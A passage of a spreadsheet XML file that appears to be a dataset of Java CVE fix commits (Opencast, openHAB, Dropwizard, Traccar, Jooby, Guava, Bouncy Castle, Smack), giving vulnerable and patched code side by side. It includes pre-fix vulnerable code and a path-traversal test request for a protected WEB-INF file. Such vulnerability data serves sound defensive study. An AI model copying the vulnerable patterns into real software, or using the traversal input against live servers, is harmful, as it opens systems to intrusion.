  public JaxbUserList getUserWithInsecurePasswordHashingAsJson() {
    JaxbUserList userList = new JaxbUserList();
    for (User user: jpaUserAndRoleProvider.findInsecurePasswordHashes()) {
      userList.add(user);
    }
    return userList;
  }
</t>
  </si>
  <si>
    <t>CVE-2020-5230</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/bbb473f34ab95497d6c432c81285efb0c739f317</t>
  </si>
  <si>
    <t>Id.java</t>
  </si>
  <si>
    <t>bbb473f34ab95497d6c432c81285efb0c739f317</t>
  </si>
  <si>
    <t xml:space="preserve">  @Deprecated
</t>
  </si>
  <si>
    <t>Limit Characters Allowed In IdsOpencast allows almost arbitrary identifiers for media packages and
elements to be used. This can be problematic for operation and security
since such identifiers are sometimes used for file system operations
which may lead to attacker being able to escape working directories and
write files to other locations.
In addition, Opencast's `Id.toString(…)` vs `Id.compact(…)` behavior,
the latter trying to mitigate some of the file system problems, can
cause errors due to identifier mismatch since an identifier may
unintentionally change.
This patch limits the characters allowed to be used in identifiers to
ensure no unsafe operations are possible and no mismatch may happen.</t>
  </si>
  <si>
    <t>IdImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">  public IdImpl(String id) {
    return id.replaceAll("/", "-").replaceAll("\\\\", "-");
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.regex.Pattern;
  private static final Pattern pattern = Pattern.compile("[\\w-_.:;()]+");
  public IdImpl(final String id) {
    if (!pattern.matcher(id).matches()) {
      throw new IllegalArgumentException("Id must match " + pattern);
    }
    return toString();
</t>
  </si>
  <si>
    <t>IngestRestService.java</t>
  </si>
  <si>
    <t xml:space="preserve">        WorkflowInstance workflow = (wdID == null) ? ingestService.ingest(mp) : ingestService.ingest(mp, wdID,
                workflowProperties);
</t>
  </si>
  <si>
    <t xml:space="preserve">        WorkflowInstance workflow = (wdID == null)
            ? ingestService.ingest(mp)
            : ingestService.ingest(mp, wdID, workflowProperties);
    } catch (IllegalArgumentException e) {
      return Response.status(Status.BAD_REQUEST).entity(e.getMessage()).build();
</t>
  </si>
  <si>
    <t>CVE-2020-5242</t>
  </si>
  <si>
    <t>https://github.com/openhab/openhab-addons/commit/4c4cb664f2e2c3866aadf117d22fb54aa8dd0031</t>
  </si>
  <si>
    <t>ExecBindingConstants.java</t>
  </si>
  <si>
    <t>4c4cb664f2e2c3866aadf117d22fb54aa8dd0031</t>
  </si>
  <si>
    <t xml:space="preserve"> * The {@link ExecBinding} class defines common constants, which are
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.eclipse.smarthome.config.core.ConfigConstants;
import java.io.File;
 * The {@link ExecBindingConstants} class defines common constants, which are
</t>
  </si>
  <si>
    <t>Merge pull request from GHSA-w698-693g-23hv* fix arbitrary code execution vulnerability
Signed-off-by: Jan N. Klug &lt;jan.n.klug@rub.de&gt;
* Update bundles/org.openhab.binding.exec/src/main/java/org/openhab/binding/exec/internal/handler/ExecHandler.java
Co-Authored-By: Christoph Weitkamp &lt;github@christophweitkamp.de&gt;
* address review comments
Signed-off-by: Jan N. Klug &lt;jan.n.klug@rub.de&gt;
Co-authored-by: Christoph Weitkamp &lt;github@christophweitkamp.de&gt;</t>
  </si>
  <si>
    <t>ExecHandlerFactory.java</t>
  </si>
  <si>
    <t xml:space="preserve">import static org.openhab.binding.exec.internal.ExecBindingConstants.THING_COMMAND;
import java.util.Collections;
import java.util.Set;
            return new ExecHandler(thing);
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.osgi.service.component.annotations.Activate;
import org.osgi.service.component.annotations.Reference;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.Collections;
import java.util.Set;
import static org.openhab.binding.exec.internal.ExecBindingConstants.THING_COMMAND;
    private final Logger logger = LoggerFactory.getLogger(ExecHandlerFactory.class);
    private final ExecWhitelistWatchService execWhitelistWatchService;
    @Activate
    public ExecHandlerFactory(@Reference ExecWhitelistWatchService execWhitelistWatchService) {
        this.execWhitelistWatchService = execWhitelistWatchService;
    }
            return new ExecHandler(thing, execWhitelistWatchService);
</t>
  </si>
  <si>
    <t>ExecWhitelistWatchService.java</t>
  </si>
  <si>
    <t xml:space="preserve">/**
 * Copyright (c) 2010-2020 Contributors to the openHAB project
 *
 * See the NOTICE file(s) distributed with this work for additional
 * information.
 *
 * This program and the accompanying materials are made available under the
 * terms of the Eclipse Public License 2.0 which is available at
 * http://www.eclipse.org/legal/epl-2.0
 *
 * SPDX-License-Identifier: EPL-2.0
 */
package org.openhab.binding.exec.internal;
import org.eclipse.jdt.annotation.NonNullByDefault;
import org.eclipse.jdt.annotation.Nullable;
import org.eclipse.smarthome.config.core.ConfigConstants;
import org.eclipse.smarthome.core.service.AbstractWatchService;
import org.osgi.service.component.annotations.Activate;
import org.osgi.service.component.annotations.Component;
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.WatchEvent;
import java.util.HashSet;
import java.util.Set;
import static java.nio.file.StandardWatchEventKinds.*;
/**
 * The {@link ExecWhitelistWatchService} provides a whitelist check for exec commands
 *
 * @author Jan N. Klug - Initial contribution
 */
@Component(service = ExecWhitelistWatchService.class)
@NonNullByDefault
public class ExecWhitelistWatchService extends AbstractWatchService {
    private static final String COMMAND_WHITELIST_PATH = ConfigConstants.getConfigFolder() + File.separator + "misc";
    private static final String COMMAND_WHITELIST_FILE = "exec.whitelist";
    private final Set&lt;String&gt; commandWhitelist = new HashSet&lt;&gt;();
    @Activate
    public ExecWhitelistWatchService() {
        super(COMMAND_WHITELIST_PATH);
    }
    @Override
    protected boolean watchSubDirectories() {
        return false;
    }
    @Override
    protected WatchEvent.Kind&lt;?&gt;[] getWatchEventKinds(@Nullable Path directory) {
        return new WatchEvent.Kind&lt;?&gt;[] { ENTRY_CREATE, ENTRY_DELETE, ENTRY_MODIFY };
    }
    @Override
    protected void processWatchEvent(@Nullable WatchEvent&lt;?&gt; event,  WatchEvent.@Nullable Kind&lt;?&gt; kind, @Nullable Path path) {
        if (path.endsWith(COMMAND_WHITELIST_FILE)) {
            commandWhitelist.clear();
            try  {
                Files.lines(path).forEach(commandWhitelist::add);
                logger.debug("Updated command whitelist: {}", commandWhitelist);
            } catch (IOException e) {
                logger.warn("Cannot read whitelist file, exec binding commands won't be processed: {}", e.getMessage());
            }
        }
    }
    /**
     * Check if a command is whitelisted
     *
     * @param command the command to check alias
     * @return true if whitelisted, false if not
     */
    public boolean isWhitelisted(String command) {
        return commandWhitelist.contains(command);
    }
}
</t>
  </si>
  <si>
    <t>CVE-2020-5245</t>
  </si>
  <si>
    <t>https://github.com/dropwizard/dropwizard/commit/d87d1e4f8e20f6494c0232bf8560c961b46db634</t>
  </si>
  <si>
    <t>d87d1e4f8e20f6494c0232bf8560c961b46db634</t>
  </si>
  <si>
    <t xml:space="preserve">     * Adds a new violation to this collector. This also sets violationOccurred to true.
     * @param msg the message of the violation
    public void addViolation(String msg) {
        context.buildConstraintViolationWithTemplate(msg)
            .addConstraintViolation();
</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.annotation.Nullable;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
    private static final Pattern ESCAPE_PATTERN = Pattern.compile("\\$\\{");
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     * @param message the message of the violation (any EL expression will be escaped and not parsed)
    public void addViolation(String message) {
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
                .addConstraintViolation();
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName the name of the property
     * @param message      the message of the violation (any EL expression will be escaped and not parsed)
     * @since 2.0.2
     */
    public void addViolation(String propertyName, String message) {
        violationOccurred = true;
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
                .addPropertyNode(propertyName)
                .addConstraintViolation();
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName the name of the property with the violation
     * @param index        the index of the element with the violation
     * @param message      the message of the violation (any EL expression will be escaped and not parsed)
     * @since 2.0.2
     */
    public void addViolation(String propertyName, Integer index, String message) {
        violationOccurred = true;
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
                .addPropertyNode(propertyName)
                .addBeanNode().inIterable().atIndex(index)
                .addConstraintViolation();
    }
    /**
     * Adds a new violation to this collector. This also sets {@code violationOccurred} to {@code true}.
     *
     * @param propertyName the name of the property with the violation
     * @param key          the key of the element with the violation
     * @param message      the message of the violation (any EL expression will be escaped and not parsed)
     * @since 2.0.2
     */
    public void addViolation(String propertyName, String key, String message) {
        violationOccurred = true;
        String messageTemplate = escapeEl(message);
        context.buildConstraintViolationWithTemplate(messageTemplate)
                .addPropertyNode(propertyName)
                .addBeanNode().inIterable().atKey(key)
                .addConstraintViolation();
    }
    @Nullable
    private String escapeEl(@Nullable String s) {
        if (s == null || s.isEmpty()) {
            return s;
        }
        final Matcher m = ESCAPE_PATTERN.matcher(s);
        final StringBuffer sb = new StringBuffer(s.length() + 16);
        while (m.find()) {
            m.appendReplacement(sb, "\\\\\\${");
        }
        m.appendTail(sb);
        return sb.toString();
</t>
  </si>
  <si>
    <t>Escape EL expressions in ViolationCollector (#3157)Fixes #3153</t>
  </si>
  <si>
    <t>CVE-2020-5246</t>
  </si>
  <si>
    <t>https://github.com/traccar/traccar/commit/e4f6e74e57ab743b65d49ae00f6624a20ca0291e</t>
  </si>
  <si>
    <t>LdapProvider.java</t>
  </si>
  <si>
    <t>e4f6e74e57ab743b65d49ae00f6624a20ca0291e</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2017 Anton Tananaev (anton@traccar.org)
                String searchString = adminFilter.replace(":login", accountName);
        String searchString = searchFilter.replace(":login", accountName);
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2017 - 2020 Anton Tananaev (anton@traccar.org)
                String searchString = adminFilter.replace(":login", encodeForLdap(accountName));
        String searchString = searchFilter.replace(":login", encodeForLdap(accountName));
    public String encodeForLdap(String input) {
        if( input == null ) {
            return null;
        }
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i &lt; input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '\\':
                    sb.append("\\5c");
                    break;
                case '*':
                    sb.append("\\2a");
                    break;
                case '(':
                    sb.append("\\28");
                    break;
                case ')':
                    sb.append("\\29");
                    break;
                case '\0':
                    sb.append("\\00");
                    break;
                default:
                    sb.append(c);
            }
        }
        return sb.toString();
    }
</t>
  </si>
  <si>
    <t>Encode LDAP user names</t>
  </si>
  <si>
    <t>CVE-2020-7647</t>
  </si>
  <si>
    <t>https://github.com/jooby-project/jooby/commit/34f526028e6cd0652125baa33936ffb6a8a4a009</t>
  </si>
  <si>
    <t>Route.java</t>
  </si>
  <si>
    <t>34f526028e6cd0652125baa33936ffb6a8a4a009</t>
  </si>
  <si>
    <t xml:space="preserve">      filter().setRoute(this);
</t>
  </si>
  <si>
    <t>asset: path traversal fix #1639</t>
  </si>
  <si>
    <t>AssetHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">import static java.util.Objects.requireNonNull;
    init(Route.normalize(pattern), Paths.get("public"), loader);
    init("/{0}", basedir, getClass().getClassLoader());
    init(Route.normalize(pattern), Paths.get("public"), getClass().getClassLoader());
  private void init(final String pattern, final Path basedir, final ClassLoader loader) {
    this.fn = pattern.equals("/")
        : (req, p) -&gt; MessageFormat.format(prefix.apply(pattern), vars(req));
    this.loader = loader(basedir, loader);
  private static Loader loader(final Path basedir, final ClassLoader classloader) {
    if (Files.exists(basedir)) {
        return classloader.getResource(name);
    return classloader::getResource;
</t>
  </si>
  <si>
    <t xml:space="preserve">import static java.util.Objects.requireNonNull;
  private String location;
  private Path basedir;
  private ClassLoader classLoader;
    this.location = Route.normalize(pattern);
    this.basedir = Paths.get("public");
    this.classLoader = loader;
    this.location = "/{0}";
    this.basedir = basedir;
    this.classLoader = getClass().getClassLoader();
    this.location = Route.normalize(pattern);
    this.basedir = Paths.get("public");
    this.classLoader = getClass().getClassLoader();
  /**
   * Set the route definition and initialize the handler.
   *
   * @param route Route definition.
   * @return This handler.
   */
  public AssetHandler setRoute(final Route.AssetDefinition route) {
    String prefix;
    boolean rootLocation = location.equals("/") || location.equals("/{0}");
    if (rootLocation) {
      String pattern = route.pattern();
      int i = pattern.indexOf("/*");
      if (i &gt; 0) {
        prefix = pattern.substring(0, i + 1);
      } else {
        prefix = pattern;
      }
    } else {
      int i = location.indexOf("{");
      if (i &gt; 0) {
        prefix = location.substring(0, i);
      } else {
        /// TODO: review what we have here
        prefix = location;
      }
    }
    if (prefix.startsWith("/")) {
      prefix = prefix.substring(1);
    }
    if (prefix.isEmpty() &amp;&amp; rootLocation) {
      throw new IllegalArgumentException(
          "For security reasons root classpath access is not allowed. Map your static resources "
              + "using a prefix like: assets(static/**); or use a location classpath prefix like: "
              + "assets(/, /static/{0})");
    }
    init(prefix, location, basedir, classLoader);
    return this;
  }
  private void init(final String classPathPrefix, final String location, final Path basedir,
      final ClassLoader loader) {
    this.fn = location.equals("/")
        : (req, p) -&gt; MessageFormat.format(prefix.apply(location), vars(req));
    this.loader = loader(basedir, classpathLoader(classPathPrefix, classLoader));
  private static Loader loader(final Path basedir, Loader classpath) {
    if (basedir != null &amp;&amp; Files.exists(basedir)) {
        return classpath.getResource(name);
    return classpath;
  }
  private static Loader classpathLoader(String prefix, ClassLoader classloader) {
    return name -&gt; {
      String safePath = safePath(name);
      if (safePath.startsWith(prefix)) {
        URL resource = classloader.getResource(safePath);
        return resource;
      }
      return null;
    };
  }
  private static String safePath(String name) {
    if (name.indexOf("./") &gt; 0) {
      Path path = toPath(name.split("/")).normalize();
      return toStringPath(path);
    }
    return name;
  }
  private static String toStringPath(Path path) {
    StringBuilder buffer = new StringBuilder();
    for (Path segment : path) {
      buffer.append("/").append(segment);
    }
    return buffer.substring(1);
  }
  private static Path toPath(String[] segments) {
    Path path = Paths.get(segments[0]);
    for (int i = 1; i &lt; segments.length; i++) {
      path = path.resolve(segments[i]);
    }
    return path;
</t>
  </si>
  <si>
    <t>AssetSource.java</t>
  </si>
  <si>
    <t xml:space="preserve">package org.jooby.internal;
import com.google.common.base.Strings;
import java.net.MalformedURLException;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
public interface AssetSource {
  URL getResource(String name);
  static AssetSource fromClassPath(ClassLoader loader, String source) {
    if (Strings.isNullOrEmpty(source) || "/".equals(source.trim())) {
      throw new IllegalArgumentException(
          "For security reasons root classpath access is not allowed: " + source);
    }
    return path -&gt; {
      URL resource = loader.getResource(path);
      if (resource == null) {
        return null;
      }
      String realPath = resource.getPath();
      if (realPath.startsWith(source)) {
        return resource;
      }
      return null;
    };
  }
  static AssetSource fromFileSystem(Path basedir) {
    return name -&gt; {
      Path path = basedir.resolve(name).normalize();
      if (Files.exists(path) &amp;&amp; path.startsWith(basedir)) {
        try {
          return path.toUri().toURL();
        } catch (MalformedURLException x) {
          // shh
        }
      }
      return null;
    };
  }
}
</t>
  </si>
  <si>
    <t>Issue1639.java</t>
  </si>
  <si>
    <t xml:space="preserve">package org.jooby.issues;
import org.jooby.test.ServerFeature;
import org.junit.Test;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import static org.junit.Assert.assertTrue;
public class Issue1639 extends ServerFeature {
  {
    Path dir = Paths.get(System.getProperty("user.dir"), "src", "test", "resources", "assets");
    assertTrue(Files.exists(dir));
    assets("/static/**", dir);
  }
  @Test
  public void shouldNotFallbackToArbitraryClasspathResources() throws Exception {
    request()
        .get("/static/WEB-INF/web2.xml")
        .expect(404);
    request()
        .get("/static/../WEB-INF/web2.xml")
        .expect(404);
  }
}
</t>
  </si>
  <si>
    <t>CVE-2020-7692</t>
  </si>
  <si>
    <t>https://github.com/googleapis/google-oauth-java-client/commit/13433cd7dd06267fc261f0b1d4764f8e3432c824</t>
  </si>
  <si>
    <t>AuthorizationCodeFlow.java</t>
  </si>
  <si>
    <t>13433cd7dd06267fc261f0b1d4764f8e3432c824</t>
  </si>
  <si>
    <t xml:space="preserve">    return new AuthorizationCodeRequestUrl(authorizationServerEncodedUrl, clientId).setScopes(
        scopes);
        clientAuthentication).setRequestInitializer(requestInitializer).setScopes(scopes);
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.google.api.client.http.HttpRequest;
import com.google.api.client.http.UrlEncodedContent;
import com.google.api.client.util.Base64;
import com.google.api.client.util.Data;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.SecureRandom;
import java.util.Map;
  /** The Proof Key for Code Exchange (PKCE) or {@code null} if this flow should not use PKCE. */
  private final PKCE pkce;
    pkce = builder.pkce;
    AuthorizationCodeRequestUrl url = new  AuthorizationCodeRequestUrl(authorizationServerEncodedUrl, clientId);
    url.setScopes(scopes);
    if (pkce != null) {
      url.setCodeChallenge(pkce.getChallenge());
      url.setCodeChallengeMethod(pkce.getChallengeMethod());
    }
    return url;
    HttpExecuteInterceptor pkceClientAuthenticationWrapper = new HttpExecuteInterceptor() {
      @Override
      public void intercept(HttpRequest request) throws IOException {
        clientAuthentication.intercept(request);
        if (pkce != null) {
          Map&lt;String, Object&gt; data = Data.mapOf(UrlEncodedContent.getContent(request).getData());
          data.put("code_verifier", pkce.getVerifier());
        }
      }
    };
        pkceClientAuthenticationWrapper).setRequestInitializer(requestInitializer).setScopes(scopes);
  /**
   * An implementation of &lt;a href="https://tools.ietf.org/html/rfc7636"&gt;Proof Key for Code Exchange&lt;/a&gt;
   * which, according to the &lt;a href="https://tools.ietf.org/html/rfc8252#section-6"&gt;OAuth 2.0 for Native Apps RFC&lt;/a&gt;,
   * is mandatory for public native apps.
   */
  private static class PKCE {
    private final String verifier;
    private String challenge;
    private String challengeMethod;
    public PKCE() {
      verifier = generateVerifier();
      generateChallenge(verifier);
    }
    private static String generateVerifier() {
      SecureRandom sr = new SecureRandom();
      byte[] code = new byte[32];
      sr.nextBytes(code);
      return Base64.encodeBase64URLSafeString(code);
    }
    /**
     * Create the PKCE code verifier. It uses the S256 method but
     * falls back to using the 'plain' method in the unlikely case
     * that the SHA-256 MessageDigest algorithm implementation can't be
     * loaded.
     */
    private void generateChallenge(String verifier) {
      try {
        byte[] bytes = verifier.getBytes();
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        md.update(bytes, 0, bytes.length);
        byte[] digest = md.digest();
        challenge = Base64.encodeBase64URLSafeString(digest);
        challengeMethod = "S256";
      } catch (NoSuchAlgorithmException e) {
        challenge = verifier;
        challengeMethod = "plain";
      }
    }
    public String getVerifier() {
      return verifier;
    }
    public String getChallenge() {
      return challenge;
    }
    public String getChallengeMethod() {
      return challengeMethod;
    }
  }
    PKCE pkce;
    /**
     * Enables Proof Key for Code Exchange (PKCE) for this Athorization Code Flow.
     * @since 1.31
     */
    @Beta
    public Builder enablePKCE() {
      this.pkce = new PKCE();
      return this;
    }
</t>
  </si>
  <si>
    <t>feat: add PKCE support to AuthorizationCodeFlow (#470)* Initial test code for a PKCE enabled Authorization Code Flow
* WIP: work on README.md
* Script to initialize keycloak by adding client via REST API.
* Improve keycloak init script and some code cleanup. Still WIP.
* WIP: work on README.md
* Working PKCE AuthorizationCodeFlow. Some cleanup of test classes.
* Add scopes back to the AuthorizationCodeRequestUrl creation.
* Simplify code by moving PKCE entirely into the AuthorizationCodeFlow class. Add documentation.
* Remove wildcard imports as that seems to be the way to do things here.
* Add @SInCE annotation in JavaDoc to the PKCE parameters of the autorization url class.
* Add PKCE unit test, documentation and minor cleanup of dependencies for code sample.
* Add PKCE unit test, documentation and minor cleanup of dependencies for code sample.
* Annotate PKCE with Beta annotation.
* Responding to code review comments
* Responding to more PR comments
* Improve Keycloak PKCE sample documentation
* Add license header with copyright to new files. Improve documentation.</t>
  </si>
  <si>
    <t>AuthorizationCodeRequestUrl.java</t>
  </si>
  <si>
    <t xml:space="preserve">import com.google.api.client.util.Key;
  /**
   * The PKCE &lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;Code Challenge&lt;/a&gt;.
   * @since 1.31
   */
  @Key("code_challenge")
  String codeChallenge;
  /**
   * The PKCE &lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;Code Challenge Method&lt;/a&gt;.
   * @since 1.31
   */
  @Key("code_challenge_method")
  String codeChallengeMethod;
  /**
   * Get the code challenge (&lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;details&lt;/a&gt;).
   *
   * @since 1.31
   */
  public String getCodeChallenge() {
    return codeChallenge;
  }
  /**
   * Get the code challenge method (&lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;details&lt;/a&gt;).
   *
   * @since 1.31
   */
  public String getCodeChallengeMethod() {
    return codeChallengeMethod;
  }
  /**
   * Set the code challenge (&lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;details&lt;/a&gt;).
   * @param codeChallenge the code challenge.
   *
   * @since 1.31
   */
  public void setCodeChallenge(String codeChallenge) {
    this.codeChallenge = codeChallenge;
  }
  /**
   * Set the code challenge method (&lt;a href="https://tools.ietf.org/html/rfc7636#section-4.3"&gt;details&lt;/a&gt;).
   * @param codeChallengeMethod the code challenge method.
   *
   * @since 1.31
   */
  public void setCodeChallengeMethod(String codeChallengeMethod) {
    this.codeChallengeMethod = codeChallengeMethod;
  }
</t>
  </si>
  <si>
    <t>CVE-2020-8908</t>
  </si>
  <si>
    <t>https://github.com/google/guava/commit/fec0dbc4634006a6162cfd4d0d09c962073ddf40</t>
  </si>
  <si>
    <t>Files.java</t>
  </si>
  <si>
    <t>fec0dbc4634006a6162cfd4d0d09c962073ddf40</t>
  </si>
  <si>
    <t xml:space="preserve">   * &lt;p&gt;Depending on the environmment that this code is run in, the system temporary directory (and
   * thus the directory this method creates) may be more visible that a program would like - files
   * written to this directory may be read or overwritten by hostile programs running on the same
   * machine.
   *
   * @deprecated For Android users, see the &lt;a
   *     href="https://developer.android.com/training/data-storage" target="_blank"&gt;Data and File
   *     Storage overview&lt;/a&gt; to select an appropriate temporary directory (perhaps {@code
   *     context.getCacheDir()}). For developers on Java 7 or later, use {@link
   *     java.nio.file.Files#createTempDirectory}, transforming it to a {@link File} using {@link
   *     java.nio.file.Path#toFile() toFile()} if needed.
  @Deprecated
</t>
  </si>
  <si>
    <t>Deprecate Files.createTempDir(), noting that better alternatives exis……t for Android as well as for users running Java 7 or later.
RELNOTES=`io`: Deprecated `Files.createTempDir()`.
-------------
Created by MOE: https://github.com/google/moe
MOE_MIGRATED_REVID=328552787</t>
  </si>
  <si>
    <t>CWE-347</t>
  </si>
  <si>
    <t>CVE-2016-1000338</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0</t>
  </si>
  <si>
    <t>DSASigner.java</t>
  </si>
  <si>
    <t>b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0</t>
  </si>
  <si>
    <t xml:space="preserve">import java.security.interfaces.DSAKey;
import java.security.interfaces.DSAPublicKey;
import org.bouncycastle.asn1.x509.SubjectPublicKeyInfo;
</t>
  </si>
  <si>
    <t xml:space="preserve">        if (s.size() != 2)
        {
            throw new IOException("malformed signature");
        }
</t>
  </si>
  <si>
    <t>added length check for sequence in DSA signatures</t>
  </si>
  <si>
    <t>Improper Verification of Cryptographic Signature</t>
  </si>
  <si>
    <t>The software does not verify, or incorrectly verifies, the cryptographic signature for data.</t>
  </si>
  <si>
    <t>CVE-2016-1000342</t>
  </si>
  <si>
    <t>https://github.com/bcgit/bc-java/commit/843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9</t>
  </si>
  <si>
    <t>ASN1Enumerated.java</t>
  </si>
  <si>
    <t>843c2e60f67d71faf81d236f448ebbe56c62c647#diff-25c3c78db788365f36839b3f2d3016b9</t>
  </si>
  <si>
    <t xml:space="preserve">        if (bytes.length &gt; 1)
        {
            if (bytes[0] == 0 &amp;&amp; (bytes[1] &amp; 0x80) == 0)
            {
                throw new IllegalArgumentException("malformed enumerated");
            }
            if (bytes[0] == (byte)0xff &amp;&amp; (bytes[1] &amp; 0x80) != 0)
            {
                throw new IllegalArgumentException("malformed enumerated");
            }
        }
</t>
  </si>
  <si>
    <t>Added header validation for INTEGER/ENUMERATEDAdded additional validations for DSA/ECDSA signature parsing.</t>
  </si>
  <si>
    <t>ASN1Integer.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if (bytes.length &gt; 1)
        {
            if (bytes[0] == 0 &amp;&amp; (bytes[1] &amp; 0x80) == 0)
            {
                throw new IllegalArgumentException("malformed integer");
            }
            if (bytes[0] == (byte)0xff &amp;&amp; (bytes[1] &amp; 0x80) != 0)
            {
                throw new IllegalArgumentException("malformed integer");
            }
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.bouncycastle.util.Arrays;
        if (!Arrays.areEqual(encoding, s.getEncoded(ASN1Encoding.DER)))
        {
            throw new IOException("malformed signature");
        }
</t>
  </si>
  <si>
    <t>SignatureSpi.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.bouncycastle.crypto.params.ECPublicKeyParameters;
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.bouncycastle.util.Arrays;
            if (s.size() != 2)
            {
                throw new IOException("malformed signature");
            }
            if (!Arrays.areEqual(encoding, s.getEncoded(ASN1Encoding.DER)))
            {
                throw new IOException("malformed signature");
            }
</t>
  </si>
  <si>
    <t>CVE-2016-10027</t>
  </si>
  <si>
    <t>https://github.com/igniterealtime/Smack/commit/059ee99ba0d5ff7758829acf5a9aeede09ec820b</t>
  </si>
  <si>
    <t>XMPPTCPConnection.java</t>
  </si>
  <si>
    <t>059ee99ba0d5ff7758829acf5a9aeede09ec820b</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jivesoftware.smack.SmackException.ConnectionException;
import org.jivesoftware.smack.SmackException.SecurityRequiredException;
    protected void afterFeaturesReceived() throws SecurityRequiredException, NotConnectedException {
        // If TLS is required but the server doesn't offer it, disconnect
        // from the server and throw an error. First check if we've already negotiated TLS
        // and are secure, however (features get parsed a second time after TLS is established).
        if (!isSecureConnection() &amp;&amp; startTlsFeature == null
                        &amp;&amp; getConfiguration().getSecurityMode() == SecurityMode.required) {
            throw new SecurityRequiredByClientException();
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jivesoftware.smack.SmackException.ConnectionException;
        // If TLS is required but the server doesn't offer it, disconnect
        // from the server and throw an error. First check if we've already negotiated TLS
        // and are secure, however (features get parsed a second time after TLS is established).
        if (!isSecureConnection() &amp;&amp; getConfiguration().getSecurityMode() == SecurityMode.required) {
            shutdown();
            throw new SecurityRequiredByClientException();
        }
    protected void afterFeaturesReceived() throws NotConnectedException {
</t>
  </si>
  <si>
    <t>Move TLS Required check at the end of connect()It was a *very* bad idea to perform the SecurityMode.Required check in
the connection's reader thread and not at the end of
AbstractXMPPConnectin's connect(). :/
This behavior dates back to 8e75091
Fixes SMACK-739</t>
  </si>
  <si>
    <t>https://github.com/igniterealtime/Smack/commit/a9d5cd4a611f47123f9561bc5a81a4555fe7cb04</t>
  </si>
  <si>
    <t>AbstractXMPPConnection.java</t>
  </si>
  <si>
    <t>a9d5cd4a611f47123f9561bc5a81a4555fe7cb04</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jivesoftware.smack.SmackException.SecurityRequiredByClientException;
        // If TLS is required but the server doesn't offer it, disconnect
        // from the server and throw an error. First check if we've already negotiated TLS
        // and are secure, however (features get parsed a second time after TLS is established).
        if (!isSecureConnection() &amp;&amp; getConfiguration().getSecurityMode() == SecurityMode.required) {
            throw new SecurityRequiredByClientException();
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.jivesoftware.smack.SmackException.SecurityRequiredByClientException;
import org.jivesoftware.smack.SmackException.SecurityRequiredException;
    protected void afterFeaturesReceived() throws SecurityRequiredException, NotConnectedException, InterruptedException {
        // If TLS is required but the server doesn't offer it, disconnect
        // from the server and throw an error. First check if we've already negotiated TLS
        // and are secure, however (features get parsed a second time after TLS is established).
        if (!isSecureConnection() &amp;&amp; startTlsFeature == null
                        &amp;&amp; getConfiguration().getSecurityMode() == SecurityMode.required) {
            throw new SecurityRequiredByClientException();
        }
</t>
  </si>
  <si>
    <t xml:space="preserve">    protected void afterFeaturesReceived() throws NotConnectedException, InterruptedException {
</t>
  </si>
  <si>
    <t>CVE-2016-3079</t>
  </si>
  <si>
    <t>https://github.com/spacewalkproject/spacewalk/commit/7b9ff9ad</t>
  </si>
  <si>
    <t>LocalizationService.java</t>
  </si>
  <si>
    <t>7b9ff9ad</t>
  </si>
  <si>
    <t xml:space="preserve">import com.redhat.rhn.common.conf.Config;
import com.redhat.rhn.common.conf.ConfigDefaults;
import com.redhat.rhn.common.db.datasource.DataResult;
import com.redhat.rhn.common.db.datasource.ModeFactory;
import com.redhat.rhn.common.db.datasource.SelectMode;
import com.redhat.rhn.common.util.StringUtil;
import com.redhat.rhn.frontend.context.Context;
import org.apache.commons.lang.StringEscapeUtils;
import org.apache.log4j.Logger;
        return "**" + messageId + "**";
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.apache.commons.lang.StringEscapeUtils;
import org.apache.log4j.Logger;
import com.redhat.rhn.common.conf.Config;
import com.redhat.rhn.common.conf.ConfigDefaults;
import com.redhat.rhn.common.db.datasource.DataResult;
import com.redhat.rhn.common.db.datasource.ModeFactory;
import com.redhat.rhn.common.db.datasource.SelectMode;
